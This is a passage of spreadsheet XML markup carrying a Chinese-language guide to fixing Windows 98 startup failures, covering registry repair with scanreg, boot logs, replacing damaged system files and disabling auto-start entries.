      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>项“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>step</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>by</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>－</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>step confirmation</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”进入单步运行方式，按照出现死机的命令选择处理方法：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　１、执行“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Process the system registry</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”计算机就死机，说明是注册表故障，那么可以重新启动按</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>F8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键，选第</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>项后，只在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Device=c:\windows\himem.sys </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这一项上按“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，其余的按“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>N</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”后，在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提示符下输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Scanreg </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>／</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">fix </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修复注册表或者是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> scanreg </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>／</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>restore</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恢复到以前系统自动备份的注册表后，再重新启动即可。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　２、在出现“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Create a startup log file (BOOTTLOG.TXT) [Enter=Y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Esc=N]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”时，选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Y</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Bootlog.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个文件，可以检查启动过程中各个系统文件装载的情况。如果在装载某一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.vxd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件时死机，可以到其它计算机上复制该</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.vxd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件拷贝过来。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　３、如果是一启动就出现“现在可以安全地关闭计算机了”，一般是因为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>System</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>vmm32.vxd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>被损坏，可以到其它计算机上重新复制一个过来。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　４、一启动就出现蓝屏并显示“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>VFAT Devcie Initialization Faild</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，表示调用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>dblbuff.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ifshlp.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件出了问题，可以在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>config.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中手工加入如：</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>device=c:\windows\dblbuff.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”和“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>devicehigh=c:\windows\ifshlp.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，如果还是不行，则表明这两个文件己损坏，可以到其他计算机上新复制过来一份。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、使用文本编辑程序将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Msdos.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>LOGO</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数设置为“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，关闭后再开机时，看看是否可进入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，若还是不行，则只能重新安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统了。在重装</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时，建议先采用覆盖原来的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的方法，这样做的好处是：如果故障能够排除，原来的许多应用程序就不用再安装了；如果覆盖式安装不能解决问题，再采用硬盘格式化之后安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的方法。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　现象七：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无法启动，但能进入安全模式。这种故障一般问题不大，修复的几率较高。具体可以参照下面的几种方法去做：　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、在安装新设备后不能正常启动，进入安全模式后，在“控制面板”－－“系统”中选择“设备管理器”选项卡，在列出的所有设备中查找前有一个感叹号冲突的设备，如果有的话，打开这个设备的“属性”，查看“资源”选项卡，看看这个设备与其它设备的中断冲突，然后取消“自动设置”复选框，单击“更改设置”按钮，选择一个没有使用的中断号即可。如果还不行，则可以在设备属性中选择“常规”选项卡，选中“在此硬件配置文件中禁用”复选框，如果能正常启动成功，证明这个硬件的驱动程序可能有问题，可以在设备管理器中将它删除后重装驱动程序。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装了启动时自动运行软的后不能正常启动，可以将其卸载，待系统可以正常启动后，尝试重新安装。顺便说一句，安装系统启动时自动运行的软件不要与其它软件在同一次启动中安装可以减少此类故障。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、电脑启动时自动运行的文件出现故障造成</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能正常启动，或者前一种情况软件无法卸载（包括不能完全卸载）的，可以到下面的地方找到并将其删除：</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、“开始”菜单内的“程序”文件夹中的“启动”文件夹内。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Config.sys</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Autoexec.bat</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中，若有则在该行前面加上“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>rem</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”不让它运行。通常防病毒程序都会在这两个文件中加入要执行的程序。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Window</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录下的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Win.ini</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>[Windows]</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Run</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Load</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数后，这里也可以在该行前加上“</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Rem</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>”，不让它执行。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、注册表（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Registry</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）中，运行注册表编辑器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(Regedit)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，进入编辑器后利用“编辑”中的“查找”功能查找产生故障的自动可执行文件，将不要执行项目的主键删除或将文件更名。注意：修改注册表时，要事先用“导出注册表文件”的方法做好备份。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>四</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、如果在系统启动时提示丢失了某些在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>system.ini</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.vxd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.386</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等文件，你可以到其他计算机上拷贝相应的文件到对应的位置，如果还不行，你还可以备份你的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows 98</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装目录下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>system.ini</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件，然后用文本编辑器打开</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>system.ini</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件找到相应的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.vxd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
